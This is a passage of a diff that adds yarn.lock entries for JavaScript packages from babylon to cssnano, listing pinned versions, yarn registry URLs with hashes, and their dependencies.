+  resolved "https://registry.yarnpkg.com/babylon/-/babylon-7.0.0-beta.47.tgz#6d1fa44f0abec41ab7c780481e62fd9aafbdea80"
+
+balanced-match@^0.4.2:
+  version "0.4.2"
+  resolved "https://registry.yarnpkg.com/balanced-match/-/balanced-match-0.4.2.tgz#cb3f3e3c732dc0f01ee70b403f302e61d7709838"
+
+balanced-match@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/balanced-match/-/balanced-match-1.0.0.tgz#89b4d199ab2bee49de164ea02b89ce462d71b767"
+
+base64-js@^1.0.2:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/base64-js/-/base64-js-1.3.0.tgz#cab1e6118f051095e58b5281aea8c1cd22bfc0e3"
+
+base@^0.11.1:
+  version "0.11.2"
+  resolved "https://registry.yarnpkg.com/base/-/base-0.11.2.tgz#7bde5ced145b6d551a90db87f83c558b4eb48a8f"
+  dependencies:
+    cache-base "^1.0.1"
+    class-utils "^0.3.5"
+    component-emitter "^1.2.1"
+    define-property "^1.0.0"
+    isobject "^3.0.1"
+    mixin-deep "^1.2.0"
+    pascalcase "^0.1.1"
+
+big.js@^3.1.3:
+  version "3.2.0"
+  resolved "https://registry.yarnpkg.com/big.js/-/big.js-3.2.0.tgz#a5fc298b81b9e0dca2e458824784b65c52ba588e"
+
+binary-extensions@^1.0.0:
+  version "1.11.0"
+  resolved "https://registry.yarnpkg.com/binary-extensions/-/binary-extensions-1.11.0.tgz#46aa1751fb6a2f93ee5e689bb1087d4b14c6c205"
+
+bluebird@^3.1.1, bluebird@^3.5.1:
+  version "3.5.1"
+  resolved "https://registry.yarnpkg.com/bluebird/-/bluebird-3.5.1.tgz#d9551f9de98f1fcda1e683d17ee91a0602ee2eb9"
+
+bn.js@^4.0.0, bn.js@^4.1.0, bn.js@^4.1.1, bn.js@^4.4.0:
+  version "4.11.8"
+  resolved "https://registry.yarnpkg.com/bn.js/-/bn.js-4.11.8.tgz#2cde09eb5ee341f484746bb0309b3253b1b1442f"
+
+boolbase@~1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/boolbase/-/boolbase-1.0.0.tgz#68dff5fbe60c51eb37725ea9e3ed310dcc1e776e"
+
+boxen@^1.2.1:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/boxen/-/boxen-1.3.0.tgz#55c6c39a8ba58d9c61ad22cd877532deb665a20b"
+  dependencies:
+    ansi-align "^2.0.0"
+    camelcase "^4.0.0"
+    chalk "^2.0.1"
+    cli-boxes "^1.0.0"
+    string-width "^2.0.0"
+    term-size "^1.2.0"
+    widest-line "^2.0.0"
+
+brace-expansion@^1.1.7:
+  version "1.1.11"
+  resolved "https://registry.yarnpkg.com/brace-expansion/-/brace-expansion-1.1.11.tgz#3c7fcbf529d87226f3d2f52b966ff5271eb441dd"
+  dependencies:
+    balanced-match "^1.0.0"
+    concat-map "0.0.1"
+
+braces@^1.8.2:
+  version "1.8.5"
+  resolved "https://registry.yarnpkg.com/braces/-/braces-1.8.5.tgz#ba77962e12dff969d6b76711e914b737857bf6a7"
+  dependencies:
+    expand-range "^1.8.1"
+    preserve "^0.2.0"
+    repeat-element "^1.1.2"
+
+braces@^2.3.0, braces@^2.3.1:
+  version "2.3.2"
+  resolved "https://registry.yarnpkg.com/braces/-/braces-2.3.2.tgz#5979fd3f14cd531565e5fa2df1abfff1dfaee729"
+  dependencies:
+    arr-flatten "^1.1.0"
+    array-unique "^0.3.2"
+    extend-shallow "^2.0.1"
+    fill-range "^4.0.0"
+    isobject "^3.0.1"
+    repeat-element "^1.1.2"
+    snapdragon "^0.8.1"
+    snapdragon-node "^2.0.1"
+    split-string "^3.0.2"
+    to-regex "^3.0.1"
+
+brorand@^1.0.1:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/brorand/-/brorand-1.1.0.tgz#12c25efe40a45e3c323eb8675a0a0ce57b22371f"
+
+browserify-aes@^1.0.0, browserify-aes@^1.0.4:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/browserify-aes/-/browserify-aes-1.2.0.tgz#326734642f403dabc3003209853bb70ad428ef48"
+  dependencies:
+    buffer-xor "^1.0.3"
+    cipher-base "^1.0.0"
+    create-hash "^1.1.0"
+    evp_bytestokey "^1.0.3"
+    inherits "^2.0.1"
+    safe-buffer "^5.0.1"
+
+browserify-cipher@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/browserify-cipher/-/browserify-cipher-1.0.1.tgz#8d6474c1b870bfdabcd3bcfcc1934a10e94f15f0"
+  dependencies:
+    browserify-aes "^1.0.4"
+    browserify-des "^1.0.0"
+    evp_bytestokey "^1.0.0"
+
+browserify-des@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/browserify-des/-/browserify-des-1.0.1.tgz#3343124db6d7ad53e26a8826318712bdc8450f9c"
+  dependencies:
+    cipher-base "^1.0.1"
+    des.js "^1.0.0"
+    inherits "^2.0.1"
+
+browserify-rsa@^4.0.0:
+  version "4.0.1"
+  resolved "https://registry.yarnpkg.com/browserify-rsa/-/browserify-rsa-4.0.1.tgz#21e0abfaf6f2029cf2fafb133567a701d4135524"
+  dependencies:
+    bn.js "^4.1.0"
+    randombytes "^2.0.1"
+
+browserify-sign@^4.0.0:
+  version "4.0.4"
+  resolved "https://registry.yarnpkg.com/browserify-sign/-/browserify-sign-4.0.4.tgz#aa4eb68e5d7b658baa6bf6a57e630cbd7a93d298"
+  dependencies:
+    bn.js "^4.1.1"
+    browserify-rsa "^4.0.0"
+    create-hash "^1.1.0"
+    create-hmac "^1.1.2"
+    elliptic "^6.0.0"
+    inherits "^2.0.1"
+    parse-asn1 "^5.0.0"
+
+browserify-zlib@^0.2.0:
+  version "0.2.0"
+  resolved "https://registry.yarnpkg.com/browserify-zlib/-/browserify-zlib-0.2.0.tgz#2869459d9aa3be245fe8fe2ca1f46e2e7f54d73f"
+  dependencies:
+    pako "~1.0.5"
+
+browserslist@^1.3.6, browserslist@^1.5.2, browserslist@^1.7.6:
+  version "1.7.7"
+  resolved "https://registry.yarnpkg.com/browserslist/-/browserslist-1.7.7.tgz#0bd76704258be829b2398bb50e4b62d1a166b0b9"
+  dependencies:
+    caniuse-db "^1.0.30000639"
+    electron-to-chromium "^1.2.7"
+
+browserslist@^3.0.0, browserslist@^3.2.8:
+  version "3.2.8"
+  resolved "https://registry.yarnpkg.com/browserslist/-/browserslist-3.2.8.tgz#b0005361d6471f0f5952797a76fc985f1f978fc6"
+  dependencies:
+    caniuse-lite "^1.0.30000844"
+    electron-to-chromium "^1.3.47"
+
+buffer-from@^1.0.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/buffer-from/-/buffer-from-1.1.0.tgz#87fcaa3a298358e0ade6e442cfce840740d1ad04"
+
+buffer-xor@^1.0.3:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/buffer-xor/-/buffer-xor-1.0.3.tgz#26e61ed1422fb70dd42e6e36729ed51d855fe8d9"
+
+buffer@^4.3.0:
+  version "4.9.1"
+  resolved "https://registry.yarnpkg.com/buffer/-/buffer-4.9.1.tgz#6d1bb601b07a4efced97094132093027c95bc298"
+  dependencies:
+    base64-js "^1.0.2"
+    ieee754 "^1.1.4"
+    isarray "^1.0.0"
+
+builtin-modules@^1.0.0:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/builtin-modules/-/builtin-modules-1.1.1.tgz#270f076c5a72c02f5b65a47df94c5fe3a278892f"
+
+builtin-status-codes@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/builtin-status-codes/-/builtin-status-codes-3.0.0.tgz#85982878e21b98e1c66425e03d0174788f569ee8"
+
+cacache@^10.0.4:
+  version "10.0.4"
+  resolved "https://registry.yarnpkg.com/cacache/-/cacache-10.0.4.tgz#6452367999eff9d4188aefd9a14e9d7c6a263460"
+  dependencies:
+    bluebird "^3.5.1"
+    chownr "^1.0.1"
+    glob "^7.1.2"
+    graceful-fs "^4.1.11"
+    lru-cache "^4.1.1"
+    mississippi "^2.0.0"
+    mkdirp "^0.5.1"
+    move-concurrently "^1.0.1"
+    promise-inflight "^1.0.1"
+    rimraf "^2.6.2"
+    ssri "^5.2.4"
+    unique-filename "^1.1.0"
+    y18n "^4.0.0"
+
+cache-base@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/cache-base/-/cache-base-1.0.1.tgz#0a7f46416831c8b662ee36fe4e7c59d76f666ab2"
+  dependencies:
+    collection-visit "^1.0.0"
+    component-emitter "^1.2.1"
+    get-value "^2.0.6"
+    has-value "^1.0.0"
+    isobject "^3.0.1"
+    set-value "^2.0.0"
+    to-object-path "^0.3.0"
+    union-value "^1.0.0"
+    unset-value "^1.0.0"
+
+cache-loader@^1.2.2:
+  version "1.2.2"
+  resolved "https://registry.yarnpkg.com/cache-loader/-/cache-loader-1.2.2.tgz#6d5c38ded959a09cc5d58190ab5af6f73bd353f5"
+  dependencies:
+    loader-utils "^1.1.0"
+    mkdirp "^0.5.1"
+    neo-async "^2.5.0"
+    schema-utils "^0.4.2"
+
+call-me-maybe@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/call-me-maybe/-/call-me-maybe-1.0.1.tgz#26d208ea89e37b5cbde60250a15f031c16a4d66b"
+
+camel-case@3.0.x:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/camel-case/-/camel-case-3.0.0.tgz#ca3c3688a4e9cf3a4cda777dc4dcbc713249cf73"
+  dependencies:
+    no-case "^2.2.0"
+    upper-case "^1.1.1"
+
+camelcase-keys@^4.0.0:
+  version "4.2.0"
+  resolved "https://registry.yarnpkg.com/camelcase-keys/-/camelcase-keys-4.2.0.tgz#a2aa5fb1af688758259c32c141426d78923b9b77"
+  dependencies:
+    camelcase "^4.1.0"
+    map-obj "^2.0.0"
+    quick-lru "^1.0.0"
+
+camelcase@^4.0.0, camelcase@^4.1.0:
+  version "4.1.0"
+  resolved "https://registry.yarnpkg.com/camelcase/-/camelcase-4.1.0.tgz#d545635be1e33c542649c69173e5de6acfae34dd"
+
+caniuse-api@^1.5.2:
+  version "1.6.1"
+  resolved "https://registry.yarnpkg.com/caniuse-api/-/caniuse-api-1.6.1.tgz#b534e7c734c4f81ec5fbe8aca2ad24354b962c6c"
+  dependencies:
+    browserslist "^1.3.6"
+    caniuse-db "^1.0.30000529"
+    lodash.memoize "^4.1.2"
+    lodash.uniq "^4.5.0"
+
+caniuse-db@^1.0.30000529, caniuse-db@^1.0.30000634, caniuse-db@^1.0.30000639:
+  version "1.0.30000856"
+  resolved "https://registry.yarnpkg.com/caniuse-db/-/caniuse-db-1.0.30000856.tgz#fbebb99abe15a5654fc7747ebb5315bdfde3358f"
+
+caniuse-lite@^1.0.30000844, caniuse-lite@^1.0.30000856:
+  version "1.0.30000856"
+  resolved "https://registry.yarnpkg.com/caniuse-lite/-/caniuse-lite-1.0.30000856.tgz#ecc16978135a6f219b138991eb62009d25ee8daa"
+
+capture-stack-trace@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/capture-stack-trace/-/capture-stack-trace-1.0.0.tgz#4a6fa07399c26bba47f0b2496b4d0fb408c5550d"
+
+chalk@^1.1.3:
+  version "1.1.3"
+  resolved "https://registry.yarnpkg.com/chalk/-/chalk-1.1.3.tgz#a8115c55e4a702fe4d150abd3872822a7e09fc98"
+  dependencies:
+    ansi-styles "^2.2.1"
+    escape-string-regexp "^1.0.2"
+    has-ansi "^2.0.0"
+    strip-ansi "^3.0.0"
+    supports-color "^2.0.0"
+
+chalk@^2.0.0, chalk@^2.0.1, chalk@^2.1.0, chalk@^2.3.0, chalk@^2.3.2, chalk@^2.4.1:
+  version "2.4.1"
+  resolved "https://registry.yarnpkg.com/chalk/-/chalk-2.4.1.tgz#18c49ab16a037b6eb0152cc83e3471338215b66e"
+  dependencies:
+    ansi-styles "^3.2.1"
+    escape-string-regexp "^1.0.5"
+    supports-color "^5.3.0"
+
+chokidar@^2.0.2, chokidar@^2.0.3:
+  version "2.0.4"
+  resolved "https://registry.yarnpkg.com/chokidar/-/chokidar-2.0.4.tgz#356ff4e2b0e8e43e322d18a372460bbcf3accd26"
+  dependencies:
+    anymatch "^2.0.0"
+    async-each "^1.0.0"
+    braces "^2.3.0"
+    glob-parent "^3.1.0"
+    inherits "^2.0.1"
+    is-binary-path "^1.0.0"
+    is-glob "^4.0.0"
+    lodash.debounce "^4.0.8"
+    normalize-path "^2.1.1"
+    path-is-absolute "^1.0.0"
+    readdirp "^2.0.0"
+    upath "^1.0.5"
+  optionalDependencies:
+    fsevents "^1.2.2"
+
+chownr@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/chownr/-/chownr-1.0.1.tgz#e2a75042a9551908bebd25b8523d5f9769d79181"
+
+chrome-trace-event@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/chrome-trace-event/-/chrome-trace-event-1.0.0.tgz#45a91bd2c20c9411f0963b5aaeb9a1b95e09cc48"
+  dependencies:
+    tslib "^1.9.0"
+
+ci-info@^1.0.0:
+  version "1.1.3"
+  resolved "https://registry.yarnpkg.com/ci-info/-/ci-info-1.1.3.tgz#710193264bb05c77b8c90d02f5aaf22216a667b2"
+
+cipher-base@^1.0.0, cipher-base@^1.0.1, cipher-base@^1.0.3:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/cipher-base/-/cipher-base-1.0.4.tgz#8760e4ecc272f4c363532f926d874aae2c1397de"
+  dependencies:
+    inherits "^2.0.1"
+    safe-buffer "^5.0.1"
+
+clap@^1.0.9:
+  version "1.2.3"
+  resolved "https://registry.yarnpkg.com/clap/-/clap-1.2.3.tgz#4f36745b32008492557f46412d66d50cb99bce51"
+  dependencies:
+    chalk "^1.1.3"
+
+class-utils@^0.3.5:
+  version "0.3.6"
+  resolved "https://registry.yarnpkg.com/class-utils/-/class-utils-0.3.6.tgz#f93369ae8b9a7ce02fd41faad0ca83033190c463"
+  dependencies:
+    arr-union "^3.1.0"
+    define-property "^0.2.5"
+    isobject "^3.0.0"
+    static-extend "^0.1.1"
+
+clean-css@4.1.x:
+  version "4.1.11"
+  resolved "https://registry.yarnpkg.com/clean-css/-/clean-css-4.1.11.tgz#2ecdf145aba38f54740f26cefd0ff3e03e125d6a"
+  dependencies:
+    source-map "0.5.x"
+
+cli-boxes@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/cli-boxes/-/cli-boxes-1.0.0.tgz#4fa917c3e59c94a004cd61f8ee509da651687143"
+
+cli-cursor@^2.0.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/cli-cursor/-/cli-cursor-2.1.0.tgz#b35dac376479facc3e94747d41d0d0f5238ffcb5"
+  dependencies:
+    restore-cursor "^2.0.0"
+
+clipboard@^2.0.0:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/clipboard/-/clipboard-2.0.1.tgz#a12481e1c13d8a50f5f036b0560fe5d16d74e46a"
+  dependencies:
+    good-listener "^1.2.2"
+    select "^1.1.2"
+    tiny-emitter "^2.0.0"
+
+clipboardy@^1.2.2:
+  version "1.2.3"
+  resolved "https://registry.yarnpkg.com/clipboardy/-/clipboardy-1.2.3.tgz#0526361bf78724c1f20be248d428e365433c07ef"
+  dependencies:
+    arch "^2.1.0"
+    execa "^0.8.0"
+
+clone@^1.0.2:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/clone/-/clone-1.0.4.tgz#da309cc263df15994c688ca902179ca3c7cd7c7e"
+
+co@^4.6.0:
+  version "4.6.0"
+  resolved "https://registry.yarnpkg.com/co/-/co-4.6.0.tgz#6ea6bdf3d853ae54ccb8e47bfa0bf3f9031fb184"
+
+coa@~1.0.1:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/coa/-/coa-1.0.4.tgz#a9ef153660d6a86a8bdec0289a5c684d217432fd"
+  dependencies:
+    q "^1.1.2"
+
+code-point-at@^1.0.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/code-point-at/-/code-point-at-1.1.0.tgz#0d070b4d043a5bea33a2f1a40e2edb3d9a4ccf77"
+
+collection-visit@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/collection-visit/-/collection-visit-1.0.0.tgz#4bc0373c164bc3291b4d368c829cf1a80a59dca0"
+  dependencies:
+    map-visit "^1.0.0"
+    object-visit "^1.0.0"
+
+color-convert@^1.3.0, color-convert@^1.9.0:
+  version "1.9.2"
+  resolved "https://registry.yarnpkg.com/color-convert/-/color-convert-1.9.2.tgz#49881b8fba67df12a96bdf3f56c0aab9e7913147"
+  dependencies:
+    color-name "1.1.1"
+
+color-name@1.1.1:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/color-name/-/color-name-1.1.1.tgz#4b1415304cf50028ea81643643bd82ea05803689"
+
+color-name@^1.0.0:
+  version "1.1.3"
+  resolved "https://registry.yarnpkg.com/color-name/-/color-name-1.1.3.tgz#a7d0558bd89c42f795dd42328f740831ca53bc25"
+
+color-string@^0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/color-string/-/color-string-0.3.0.tgz#27d46fb67025c5c2fa25993bfbf579e47841b991"
+  dependencies:
+    color-name "^1.0.0"
+
+color@^0.11.0:
+  version "0.11.4"
+  resolved "https://registry.yarnpkg.com/color/-/color-0.11.4.tgz#6d7b5c74fb65e841cd48792ad1ed5e07b904d764"
+  dependencies:
+    clone "^1.0.2"
+    color-convert "^1.3.0"
+    color-string "^0.3.0"
+
+colormin@^1.0.5:
+  version "1.1.2"
+  resolved "https://registry.yarnpkg.com/colormin/-/colormin-1.1.2.tgz#ea2f7420a72b96881a38aae59ec124a6f7298133"
+  dependencies:
+    color "^0.11.0"
+    css-color-names "0.0.4"
+    has "^1.0.1"
+
+colors@~1.1.2:
+  version "1.1.2"
+  resolved "https://registry.yarnpkg.com/colors/-/colors-1.1.2.tgz#168a4701756b6a7f51a12ce0c97bfa28c084ed63"
+
+commander@2.15.x, commander@^2.15.1, commander@~2.15.0:
+  version "2.15.1"
+  resolved "https://registry.yarnpkg.com/commander/-/commander-2.15.1.tgz#df46e867d0fc2aec66a34662b406a9ccafff5b0f"
+
+commander@~2.13.0:
+  version "2.13.0"
+  resolved "https://registry.yarnpkg.com/commander/-/commander-2.13.0.tgz#6964bca67685df7c1f1430c584f07d7597885b9c"
+
+common-tags@^1.4.0:
+  version "1.8.0"
+  resolved "https://registry.yarnpkg.com/common-tags/-/common-tags-1.8.0.tgz#8e3153e542d4a39e9b10554434afaaf98956a937"
+
+commondir@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/commondir/-/commondir-1.0.1.tgz#ddd800da0c66127393cca5950ea968a3aaf1253b"
+
+component-emitter@^1.2.1:
+  version "1.2.1"
+  resolved "https://registry.yarnpkg.com/component-emitter/-/component-emitter-1.2.1.tgz#137918d6d78283f7df7a6b7c5a63e140e69425e6"
+
+concat-map@0.0.1:
+  version "0.0.1"
+  resolved "https://registry.yarnpkg.com/concat-map/-/concat-map-0.0.1.tgz#d8a96bd77fd68df7793a73036a3ba0d5405d477b"
+
+concat-stream@^1.5.0:
+  version "1.6.2"
+  resolved "https://registry.yarnpkg.com/concat-stream/-/concat-stream-1.6.2.tgz#904bdf194cd3122fc675c77fc4ac3d4ff0fd1a34"
+  dependencies:
+    buffer-from "^1.0.0"
+    inherits "^2.0.3"
+    readable-stream "^2.2.2"
+    typedarray "^0.0.6"
+
+configstore@^3.0.0:
+  version "3.1.2"
+  resolved "https://registry.yarnpkg.com/configstore/-/configstore-3.1.2.tgz#c6f25defaeef26df12dd33414b001fe81a543f8f"
+  dependencies:
+    dot-prop "^4.1.0"
+    graceful-fs "^4.1.2"
+    make-dir "^1.0.0"
+    unique-string "^1.0.0"
+    write-file-atomic "^2.0.0"
+    xdg-basedir "^3.0.0"
+
+connect-history-api-fallback@^1.5.0:
+  version "1.5.0"
+  resolved "https://registry.yarnpkg.com/connect-history-api-fallback/-/connect-history-api-fallback-1.5.0.tgz#b06873934bc5e344fef611a196a6faae0aee015a"
+
+consola@^1.2.0:
+  version "1.4.1"
+  resolved "https://registry.yarnpkg.com/consola/-/consola-1.4.1.tgz#4b1c6259c8db23f51e7cfb68cd383ec5ee298f0e"
+  dependencies:
+    chalk "^2.3.2"
+    figures "^2.0.0"
+    lodash "^4.17.5"
+    std-env "^1.1.0"
+
+console-browserify@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/console-browserify/-/console-browserify-1.1.0.tgz#f0241c45730a9fc6323b206dbf38edc741d0bb10"
+  dependencies:
+    date-now "^0.1.4"
+
+console-control-strings@^1.0.0, console-control-strings@~1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/console-control-strings/-/console-control-strings-1.1.0.tgz#3d7cf4464db6446ea644bf4b39507f9851008e8e"
+
+consolidate@^0.15.1:
+  version "0.15.1"
+  resolved "https://registry.yarnpkg.com/consolidate/-/consolidate-0.15.1.tgz#21ab043235c71a07d45d9aad98593b0dba56bab7"
+  dependencies:
+    bluebird "^3.1.1"
+
+constants-browserify@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/constants-browserify/-/constants-browserify-1.0.0.tgz#c20b96d8c617748aaf1c16021760cd27fcb8cb75"
+
+content-disposition@~0.5.0:
+  version "0.5.2"
+  resolved "https://registry.yarnpkg.com/content-disposition/-/content-disposition-0.5.2.tgz#0cf68bb9ddf5f2be7961c3a85178cb85dba78cb4"
+
+content-type@^1.0.0:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/content-type/-/content-type-1.0.4.tgz#e138cc75e040c727b1966fe5e5f8c9aee256fe3b"
+
+convert-source-map@^1.1.0:
+  version "1.5.1"
+  resolved "https://registry.yarnpkg.com/convert-source-map/-/convert-source-map-1.5.1.tgz#b8278097b9bc229365de5c62cf5fcaed8b5599e5"
+
+cookies@~0.7.0:
+  version "0.7.1"
+  resolved "https://registry.yarnpkg.com/cookies/-/cookies-0.7.1.tgz#7c8a615f5481c61ab9f16c833731bcb8f663b99b"
+  dependencies:
+    depd "~1.1.1"
+    keygrip "~1.0.2"
+
+copy-concurrently@^1.0.0:
+  version "1.0.5"
+  resolved "https://registry.yarnpkg.com/copy-concurrently/-/copy-concurrently-1.0.5.tgz#92297398cae34937fcafd6ec8139c18051f0b5e0"
+  dependencies:
+    aproba "^1.1.1"
+    fs-write-stream-atomic "^1.0.8"
+    iferr "^0.1.5"
+    mkdirp "^0.5.1"
+    rimraf "^2.5.4"
+    run-queue "^1.0.0"
+
+copy-descriptor@^0.1.0:
+  version "0.1.1"
+  resolved "https://registry.yarnpkg.com/copy-descriptor/-/copy-descriptor-0.1.1.tgz#676f6eb3c39997c2ee1ac3a924fd6124748f578d"
+
+copy-webpack-plugin@^4.5.1:
+  version "4.5.1"
+  resolved "https://registry.yarnpkg.com/copy-webpack-plugin/-/copy-webpack-plugin-4.5.1.tgz#fc4f68f4add837cc5e13d111b20715793225d29c"
+  dependencies:
+    cacache "^10.0.4"
+    find-cache-dir "^1.0.0"
+    globby "^7.1.1"
+    is-glob "^4.0.0"
+    loader-utils "^1.1.0"
+    minimatch "^3.0.4"
+    p-limit "^1.0.0"
+    serialize-javascript "^1.4.0"
+
+core-js@^2.4.0, core-js@^2.5.3:
+  version "2.5.7"
+  resolved "https://registry.yarnpkg.com/core-js/-/core-js-2.5.7.tgz#f972608ff0cead68b841a16a932d0b183791814e"
+
+core-util-is@~1.0.0:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/core-util-is/-/core-util-is-1.0.2.tgz#b5fd54220aa2bc5ab57aab7140c940754503c1a7"
+
+cosmiconfig@^2.1.0, cosmiconfig@^2.1.1:
+  version "2.2.2"
+  resolved "https://registry.yarnpkg.com/cosmiconfig/-/cosmiconfig-2.2.2.tgz#6173cebd56fac042c1f4390edf7af6c07c7cb892"
+  dependencies:
+    is-directory "^0.3.1"
+    js-yaml "^3.4.3"
+    minimist "^1.2.0"
+    object-assign "^4.1.0"
+    os-homedir "^1.0.1"
+    parse-json "^2.2.0"
+    require-from-string "^1.1.0"
+
+cosmiconfig@^5.0.2:
+  version "5.0.5"
+  resolved "https://registry.yarnpkg.com/cosmiconfig/-/cosmiconfig-5.0.5.tgz#a809e3c2306891ce17ab70359dc8bdf661fe2cd0"
+  dependencies:
+    is-directory "^0.3.1"
+    js-yaml "^3.9.0"
+    parse-json "^4.0.0"
+
+create-ecdh@^4.0.0:
+  version "4.0.3"
+  resolved "https://registry.yarnpkg.com/create-ecdh/-/create-ecdh-4.0.3.tgz#c9111b6f33045c4697f144787f9254cdc77c45ff"
+  dependencies:
+    bn.js "^4.1.0"
+    elliptic "^6.0.0"
+
+create-error-class@^3.0.0:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/create-error-class/-/create-error-class-3.0.2.tgz#06be7abef947a3f14a30fd610671d401bca8b7b6"
+  dependencies:
+    capture-stack-trace "^1.0.0"
+
+create-hash@^1.1.0, create-hash@^1.1.2:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/create-hash/-/create-hash-1.2.0.tgz#889078af11a63756bcfb59bd221996be3a9ef196"
+  dependencies:
+    cipher-base "^1.0.1"
+    inherits "^2.0.1"
+    md5.js "^1.3.4"
+    ripemd160 "^2.0.1"
+    sha.js "^2.4.0"
+
+create-hmac@^1.1.0, create-hmac@^1.1.2, create-hmac@^1.1.4:
+  version "1.1.7"
+  resolved "https://registry.yarnpkg.com/create-hmac/-/create-hmac-1.1.7.tgz#69170c78b3ab957147b2b8b04572e47ead2243ff"
+  dependencies:
+    cipher-base "^1.0.3"
+    create-hash "^1.1.0"
+    inherits "^2.0.1"
+    ripemd160 "^2.0.0"
+    safe-buffer "^5.0.1"
+    sha.js "^2.4.8"
+
+cross-spawn@^5.0.1:
+  version "5.1.0"
+  resolved "https://registry.yarnpkg.com/cross-spawn/-/cross-spawn-5.1.0.tgz#e8bd0efee58fcff6f8f94510a0a554bbfa235449"
+  dependencies:
+    lru-cache "^4.0.1"
+    shebang-command "^1.2.0"
+    which "^1.2.9"
+
+cross-spawn@^6.0.5:
+  version "6.0.5"
+  resolved "https://registry.yarnpkg.com/cross-spawn/-/cross-spawn-6.0.5.tgz#4a5ec7c64dfae22c3a14124dbacdee846d80cbc4"
+  dependencies:
+    nice-try "^1.0.4"
+    path-key "^2.0.1"
+    semver "^5.5.0"
+    shebang-command "^1.2.0"
+    which "^1.2.9"
+
+crypto-browserify@^3.11.0:
+  version "3.12.0"
+  resolved "https://registry.yarnpkg.com/crypto-browserify/-/crypto-browserify-3.12.0.tgz#396cf9f3137f03e4b8e532c58f698254e00f80ec"
+  dependencies:
+    browserify-cipher "^1.0.0"
+    browserify-sign "^4.0.0"
+    create-ecdh "^4.0.0"
+    create-hash "^1.1.0"
+    create-hmac "^1.1.0"
+    diffie-hellman "^5.0.0"
+    inherits "^2.0.1"
+    pbkdf2 "^3.0.3"
+    public-encrypt "^4.0.0"
+    randombytes "^2.0.0"
+    randomfill "^1.0.3"
+
+crypto-random-string@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/crypto-random-string/-/crypto-random-string-1.0.0.tgz#a230f64f568310e1498009940790ec99545bca7e"
+
+css-color-names@0.0.4:
+  version "0.0.4"
+  resolved "https://registry.yarnpkg.com/css-color-names/-/css-color-names-0.0.4.tgz#808adc2e79cf84738069b646cb20ec27beb629e0"
+
+css-loader@^0.28.11:
+  version "0.28.11"
+  resolved "https://registry.yarnpkg.com/css-loader/-/css-loader-0.28.11.tgz#c3f9864a700be2711bb5a2462b2389b1a392dab7"
+  dependencies:
+    babel-code-frame "^6.26.0"
+    css-selector-tokenizer "^0.7.0"
+    cssnano "^3.10.0"
+    icss-utils "^2.1.0"
+    loader-utils "^1.0.2"
+    lodash.camelcase "^4.3.0"
+    object-assign "^4.1.1"
+    postcss "^5.0.6"
+    postcss-modules-extract-imports "^1.2.0"
+    postcss-modules-local-by-default "^1.2.0"
+    postcss-modules-scope "^1.1.0"
+    postcss-modules-values "^1.3.0"
+    postcss-value-parser "^3.3.0"
+    source-list-map "^2.0.0"
+
+css-parse@1.7.x:
+  version "1.7.0"
+  resolved "https://registry.yarnpkg.com/css-parse/-/css-parse-1.7.0.tgz#321f6cf73782a6ff751111390fc05e2c657d8c9b"
+
+css-select@^1.1.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/css-select/-/css-select-1.2.0.tgz#2b3a110539c5355f1cd8d314623e870b121ec858"
+  dependencies:
+    boolbase "~1.0.0"
+    css-what "2.1"
+    domutils "1.5.1"
+    nth-check "~1.0.1"
+
+css-selector-tokenizer@^0.7.0:
+  version "0.7.0"
+  resolved "https://registry.yarnpkg.com/css-selector-tokenizer/-/css-selector-tokenizer-0.7.0.tgz#e6988474ae8c953477bf5e7efecfceccd9cf4c86"
+  dependencies:
+    cssesc "^0.1.0"
+    fastparse "^1.1.1"
+    regexpu-core "^1.0.0"
+
+css-what@2.1:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/css-what/-/css-what-2.1.0.tgz#9467d032c38cfaefb9f2d79501253062f87fa1bd"
+
+cssesc@^0.1.0:
+  version "0.1.0"
+  resolved "https://registry.yarnpkg.com/cssesc/-/cssesc-0.1.0.tgz#c814903e45623371a0477b40109aaafbeeaddbb4"
+
+cssnano@^3.10.0:
+  version "3.10.0"
+  resolved "https://registry.yarnpkg.com/cssnano/-/cssnano-3.10.0.tgz#4f38f6cea2b9b17fa01490f23f1dc68ea65c1c38"
